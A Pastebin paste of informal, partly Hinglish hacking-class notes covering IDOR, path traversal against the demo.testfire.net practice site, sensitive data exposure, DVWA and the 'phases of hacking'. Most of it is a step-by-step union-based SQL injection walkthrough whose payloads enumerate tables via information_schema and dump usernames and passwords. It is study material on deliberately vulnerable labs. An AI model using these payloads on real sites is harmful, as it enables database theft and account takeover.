Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Insecure Direct Object Reference
- ================================
- Dirctly accessing the unsecured files and configurations and settings which are neither authorized nor validated by the administrator.
- home ---> www.bankudao.com/...../php?id=home
- user profile --> www.bankudao.com/...../php?id=user_profile
- profile setting ---> www.bankudao.com/...../php?id=profile_setting
- www.facebook.com/sidigudiluv/....?id=AviTathgur
- www.facebook.com/sidigudiluv/....?id=YashTathgur
- www.facebook.com/AviTathgur
- pages which are not allowed to normal user to go.....
- www.bankudalo.com/user+profile
- /../settings/config.html
- site: demo.testfire.net ---> test
- lucideus --> testphp.vulnweb
- IBM appscan
- http://demo.testfire.net/default.aspx?content=personal_deposit.htm
- http://demo.testfire.net/default.aspx?content=../default.aspx.cs%00.html
- Sensetive Data Exposure
- =======================
- hamara sensative data sabko dekhana.....
- 1. userid and password
- 2. Personal Information --> Address, Phone number, SSN
- 3. Banking Information --> Account Number, Card Number, Black money
- 4. Health Information --> insurance
- via these information we can even bankrupt Donald Trump, Bill gates, Mark Zx,xmxmxm
- 1. Week Security Configuration --> SQL Injection, intercepting
- 2. Week Cryptography --> SQL Injection
- DVWA --> Damn Vulnerable Web Application
- ========================================
- Vulnerable application... by default ---> test --> application's security---> hackable very easily....
- 5 Phases of Hacking
- ===================
- 1. Information Gathering
- 2. Scanning
- 3. Gaining Access
- 4. Maintaining Access
- 5. Clearing Tracks
- SQL --> Structured Query Language
- =================================
- User to database interaction ----
- IRCTC ----> Book Tickets
- Login id, Password
- Date, Location, Destination
- Select Trains from batabase where date="" and location="" and destication=""
- It is a database programming language in which we communicate with the database in the form of a querry.,...
- ticket counter ---> querry----> computer p kuch command ---> enter ---> command --> database ---> answer
- SQL Injection
- =============
- Querry which are harmful and can give the juicy data from the database----> me koi query fire krta hu.... result is username and password
- select username and password from IrctcDatabase;
- SQL Injection --> UNION BASED
- 1. to find the GET method
- something=something
- php?id=1
- php?cat=34
- php?cat=miaKhalifa
- php?sunny=khalifa
- 2. To check the vulnerability
- id=1'
- it will give me an error... which confirms that the site is vulnerable to sql injection.
- 3. Now i will check the numnber of columns in the database
- order by 1--+
- order by 2--+
- order by 3--+
- 4. I will ask him to merge all the columns and show the data to me
- union select all 1,2--
- 5. Now i will check the version and database of the website
- union select all 1,version()-- ----> for checking the version
- union select all 1,database()-- ----> for checking the database
- 6. let's call database ke maa ---> information_schema
- union all select 1, table_names from information_schema.tables--
- we will get the list of all the tables present inside the database
- 7. Now i will explore the particular table---> users
- union all select 1, column_name from information_schema.columns where table_name="users"--
- user_id, first_name, last_name,user,password
- 8. Now i will exploit the final table of the users
- union all select 1, group_concat(user_id, first_name, last_name, user, password) from users--
Add Comment
Please, Sign In to add comment